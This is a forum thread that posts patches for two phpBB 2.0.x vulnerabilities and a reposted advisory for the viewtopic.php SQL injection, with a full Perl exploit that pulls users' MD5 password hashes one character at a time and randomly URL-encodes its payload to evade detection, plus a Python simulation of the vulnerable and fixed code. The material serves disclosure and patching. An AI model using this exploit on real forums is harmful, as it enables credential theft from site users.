Fixing two security vulnerabilities in phpBB 2.0.x

Posted 2003-6-29 13:36:49
The phpBB development team recently published fixes for two security vulnerabilities in phpBB 2.0.x:

1. SQL injection vulnerability:
Edit viewtopic.php. Immediately before
[code:1]if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
{
      $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
}
else if ( isset($HTTP_GET_VARS['topic']) )
{
      $topic_id = intval($HTTP_GET_VARS['topic']);
} [/code:1]
insert:
[code:1]$topic_id = $post_id = false; [/code:1]

Then replace the following code:

[code:1]$join_sql_table = ( !isset($post_id) ) ? '' : ", " . POSTS_TABLE . " p, " . POSTS_TABLE . " p2 ";
$join_sql = ( !isset($post_id) ) ? "t.topic_id = $topic_id" : "p.post_id = $post_id AND t.topic_id = p.topic_id AND p2.topic_id = p.topic_id AND p2.post_id <= $post_id";
$count_sql = ( !isset($post_id) ) ? '' : ", COUNT(p2.post_id) AS prev_posts";

$order_sql = ( !isset($post_id) ) ? '' : "GROUP BY p.post_id, t.topic_id, t.topic_title, t.topic_status, t.topic_replies, t.topic_time, t.topic_type, t.topic_vote, t.topic_last_post_id, f.forum_name, f.forum_status, f.forum_id, f.auth_view, f.auth_read, f.auth_post, f.auth_reply, f.auth_edit, f.auth_delete, f.auth_sticky, f.auth_announce, f.auth_pollcreate, f.auth_vote, f.auth_attachments ORDER BY p.post_id ASC"; [/code:1]
with:

[code:1]$join_sql_table = ( empty($post_id) ) ? '' : ", " . POSTS_TABLE . " p, " . POSTS_TABLE . " p2 ";
$join_sql = ( empty($post_id) ) ? "t.topic_id = $topic_id" : "p.post_id = $post_id AND t.topic_id = p.topic_id AND p2.topic_id = p.topic_id AND p2.post_id <= $post_id";
$count_sql = ( empty($post_id) ) ? '' : ", COUNT(p2.post_id) AS prev_posts";

$order_sql = ( empty($post_id) ) ? '' : "GROUP BY p.post_id, t.topic_id, t.topic_title, t.topic_status, t.topic_replies, t.topic_time, t.topic_type, t.topic_vote, t.topic_last_post_id, f.forum_name, f.forum_status, f.forum_id, f.auth_view, f.auth_read, f.auth_post, f.auth_reply, f.auth_edit, f.auth_delete, f.auth_sticky, f.auth_announce, f.auth_pollcreate, f.auth_vote, f.auth_attachments ORDER BY p.post_id ASC"; [/code:1]

2. styles_admin unauthorized access vulnerability:
Edit admin/admin_styles.php.
Replace the following code:

[code:1]//
// Load default header
//
//
// Check if the user has cancled a confirmation message.
//
$phpbb_root_path = "./../";

$confirm = ( isset($HTTP_POST_VARS['confirm']) ) ? TRUE : FALSE;
$cancel = ( isset($HTTP_POST_VARS['cancel']) ) ? TRUE : FALSE;

if (empty($HTTP_POST_VARS['send_file']))
{
   $no_page_header = ( $cancel ) ? TRUE : FALSE;
   require($phpbb_root_path . 'extension.inc');
   require('./pagestart.' . $phpEx);
}

if ($cancel)
{
   redirect('admin/' . append_sid("admin_styles.$phpEx", true));
} [/code:1]
with:
[code:1]//
// Load default header
//
//
// Check if the user has cancled a confirmation message.
//
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');

$confirm = ( isset($HTTP_POST_VARS['confirm']) ) ? TRUE : FALSE;
$cancel = ( isset($HTTP_POST_VARS['cancel']) ) ? TRUE : FALSE;

$no_page_header = (!empty($HTTP_POST_VARS['send_file']) || $cancel) ? TRUE : FALSE;

require('./pagestart.' . $phpEx);

if ($cancel)
{
   redirect('admin/' . append_sid("admin_styles.$phpEx", true));
} [/code:1]

Users can also simply upgrade to phpBB 2.0.5. (Compiled by hutuworm)
OP | Posted 2003-7-1 10:50:27
phpBB viewtopic.php SQL injection vulnerability

Published: 2003-06-20
Updated: 2003-06-27

Affected systems:
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 7979

phpBB is a popular web-based forum application.

The viewtopic.php script included with phpBB does not properly handle user-supplied requests. A remote attacker can exploit this through SQL injection to steal sensitive user data or corrupt the database.

When viewtopic.php is called, "topic_id" is taken directly from the GET request and passed into an SQL query, so an attacker can submit a crafted SQL string to obtain MD5 password hashes; these hashes can then be used for autologin or brute-force cracking.

<*Source: Rick ([email protected]

Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105607263130644&w=2
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching purposes. Use at your own risk!

Rick ([email protected]) provided the following test method:

[code:1]#!/usr/bin/perl -w
#
#
# phpBB password disclosure vuln.
# - rick patel ([email protected]) -
#
# There is a sql injection vuln which exists in /viewtopic.php file. The variable is $topic_id
# which gets passed directly to sql server in query. Attacker could pass a special sql string which
# can used to see md5 password hash for any user (!) for phpBB. This pass can be later used with
# autologin or cracked using john.
#
# Details:
#
# this is checking done for $topic_id in viewtopic.php:
#
# if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
# {
#     $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
# }
# else if ( isset($HTTP_GET_VARS['topic']) )
# {
#     $topic_id = intval($HTTP_GET_VARS['topic']);
# }
#
# ok... no else statement at end
# now if GET[view]=newest and GET[sid] is set, this query gets executed:
#
# $sql = "SELECT p.post_id
#     FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
#     WHERE s.session_id = '$session_id'
#         AND u.uid = s.session_user_id
#         AND p.topic_id = $topic_id
#         AND p.post_time >= u.user_lastvisit
#     ORDER BY p.post_time ASC
#     LIMIT 1";
#
# Ahh! $topic_id gets passed directly to query. So how can we use this to do something important? Well
# I decided to use union and create a second query will get us something useful. There were a couple of
# problems I ran into. first, phpBB only cares about the first row returned. second, the select for first
# query is p.post_id which is int, so int becomes the type returned for any other query in union. third,
# there is rest of junk at end " AND p.post_time >= ..." We tell mysql to ignore that by placing /* at end
# of our injected query. So what query can we make that returns only int?
# this one => select ord(substring(pass,$index,1)) from phpbb_users where uid = $uid
# Then all we have to do is query 32 times which $index from 1-32 and we get ord value of all chars of
# md5 hash password.
#
# I have only tested this with mysql 4 and pgsql . Mysql 3.x does not support unions so you would have to tweak
# the query to do anything useful.
#
# This script is for educational purpose only. Please don't use it to do anything else.
#

use IO::Socket;

$remote     = shift || 'localhost';
$view_topic = shift || '/phpBB2/viewtopic.php';
$uid        = shift || 2;
$port       = 80;

$dbtype = 'mysql4'; # mysql4 or pgsql


print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n";

$p = "";

# One request per hash character; the server leaks ord(char) as the post_id
# in its redirect (Location: viewtopic.php?p=<num>#<num>).
for($index=1; $index<=32; $index++)
{
    $socket = IO::Socket::INET->new(PeerAddr => $remote,
                                    PeerPort => $port,
                                    Proto    => "tcp",
                                    Type     => SOCK_STREAM)
        or die "Couldn't connect to $remote:$port : $@\n";

    # Build the whole request first: request line and headers separated by
    # CRLF, and the header block closed by a single blank line, so that the
    # Cookie and Host headers are actually part of the request.
    $str  = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0\r\n";
    $str .= "Cookie: phpBB2mysql_sid=1\r\n"; # replace this for pgsql or remove it
    $str .= "Host: $remote\r\n\r\n";

    print $socket $str;

    while ($answer = <$socket>)
    {
        if ($answer =~ /Location:.*\x23(\d+)/) # Matches the Location: viewtopic.php?p=<num>#<num>
        {
            $p .= chr ($1);
        }
    }

    close($socket);
}

print "\nMD5 Hash for uid $uid is $p\n";

# random encode str. helps avoid detection
sub random_encode
{
    my $str = shift;
    my $ret = "";
    for(my $i=0; $i<length($str); $i++)
    {
        my $c = substr($str,$i,1);
        my $j = rand(length($str) * 1000);

        # percent-encode spaces always, other characters at random
        if (int($j) % 2 || $c eq ' ')
        {
            $ret .= "%" . sprintf("%x",ord($c));
        }
        else
        {
            $ret .= $c;
        }
    }
    return $ret;
}

# Injected SQL for the current $index; the trailing /* (mysql) comments out
# the rest of phpBB's query.
sub make_dbsql
{
    if ($dbtype eq 'mysql4')
    {
        return " union select ord(substring(pass," . $index . ",1)) from phpbb_users where uid=$uid/*" ;
    } elsif ($dbtype eq 'pgsql')
    {
        return "; select ascii(substring(pass from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.uid=$uid or false";
    }
    else
    {
        return "";
    }
} [/code:1]
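To make the mechanism in the advisory and script above concrete, here is an added example that is not part of the original post, of the advisory, or of phpBB itself: a Python simulation of the pre-patch `viewtopic.php?view=newest` query builder (including the `register_globals` behaviour that lets a raw `?topic_id=` parameter reach the query without `intval()`), the patched builder that starts from `$topic_id = $post_id = false;` as in the fix from the first post, and the character-by-character hash extraction the posted Perl script performs by reading the `Location: viewtopic.php?p=<num>#<num>` redirect. The tables, session, user row and hash are constructed sample data; the column names follow the posted script (`uid`, `pass`) rather than phpBB's real schema; the database is SQLite, so the payload uses `unicode(substr())` in place of MySQL's `ord(substring())` and relies on SQLite treating an unterminated `/*` as a comment to end of input.

```python
import re
import sqlite3

# Constructed sample data standing in for phpbb_users / phpbb_posts /
# phpbb_sessions. Column names follow the posted exploit (uid, pass), not the
# real phpBB 2.0 schema; the hash is a sample value, not a real credential.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE phpbb_users (uid INTEGER, username TEXT, pass TEXT,
                                  user_lastvisit INTEGER);
        CREATE TABLE phpbb_posts (post_id INTEGER, topic_id INTEGER,
                                  post_time INTEGER);
        CREATE TABLE phpbb_sessions (session_id TEXT, session_user_id INTEGER);
        INSERT INTO phpbb_users VALUES
            (2, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', 0);
        INSERT INTO phpbb_posts VALUES (10, 1, 100), (11, 1, 200);
        INSERT INTO phpbb_sessions VALUES ('1', 2);
    """)
    return db

def intval(value):
    """PHP-style intval(): the leading integer of the string, else 0."""
    m = re.match(r"\s*[+-]?\d+", str(value))
    return int(m.group()) if m else 0

# The view=newest query quoted in the advisory, with $topic_id interpolated as-is.
NEWEST_SQL = (
    "SELECT p.post_id FROM phpbb_posts p, phpbb_sessions s, phpbb_users u "
    "WHERE s.session_id = '{sid}' AND u.uid = s.session_user_id "
    "AND p.topic_id = {topic_id} AND p.post_time >= u.user_lastvisit "
    "ORDER BY p.post_time ASC LIMIT 1"
)

def build_query_vulnerable(get, sid):
    """Pre-patch viewtopic.php under register_globals: every GET parameter
    already exists as a PHP variable, and no branch resets $topic_id."""
    php_vars = dict(get)                      # register_globals
    if "t" in get:
        php_vars["topic_id"] = intval(get["t"])
    elif "topic" in get:
        php_vars["topic_id"] = intval(get["topic"])
    # no else branch: a raw ?topic_id=... reaches the query without intval()
    return NEWEST_SQL.format(sid=sid, topic_id=php_vars.get("topic_id"))

def build_query_fixed(get, sid):
    """Patched version: $topic_id = $post_id = false; before the checks."""
    topic_id = False
    if "t" in get:
        topic_id = intval(get["t"])
    elif "topic" in get:
        topic_id = intval(get["topic"])
    if not topic_id:                          # nothing legitimate selected a topic
        raise ValueError("no topic selected")
    return NEWEST_SQL.format(sid=sid, topic_id=topic_id)

def handle_request(db, get, build_query):
    """Simulate viewtopic.php?view=newest: redirect to the first unread post.
    Returns the Location header, or None when no post is found or on error."""
    if get.get("view") != "newest" or "sid" not in get:
        return None
    sid = re.sub(r"[^0-9a-f]", "", get["sid"])  # simplification: hex-only sid
    try:
        row = db.execute(build_query(get, sid)).fetchone()
    except (sqlite3.Error, ValueError):
        return None
    if row is None:
        return None
    return f"Location: viewtopic.php?p={row[0]}#{row[0]}"

def extract_hash(db, uid, build_query=build_query_vulnerable, length=32):
    """What the posted Perl script does: one request per hash character,
    reading the character's code point out of the redirect target.
    SQLite dialect: unicode(substr()) replaces MySQL's ord(substring())."""
    recovered = ""
    for index in range(1, length + 1):
        payload = (f"-1 union select unicode(substr(pass,{index},1)) "
                   f"from phpbb_users where uid={uid}/*")   # /* eats the rest
        location = handle_request(
            db, {"sid": "1", "topic_id": payload, "view": "newest"}, build_query)
        m = re.search(r"Location:.*#(\d+)", location or "")
        if not m:
            break
        recovered += chr(int(m.group(1)))
    return recovered

if __name__ == "__main__":
    db = make_db()
    print("vulnerable builder:", extract_hash(db, 2))
    print("fixed builder:     ", repr(extract_hash(db, 2, build_query_fixed)))
```

Run against the vulnerable builder the loop recovers the full 32-character sample hash; against the fixed builder it recovers nothing, because once `$topic_id` starts out as `false` a stray `?topic_id=` parameter can no longer populate it, and the only remaining paths (`?t=` and `?topic=`) go through `intval()`, which reduces the payload to `-1`.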
Posted 2003-7-2 21:20:43
cool, gj.
© 2021 Powered by Discuz! X3.5.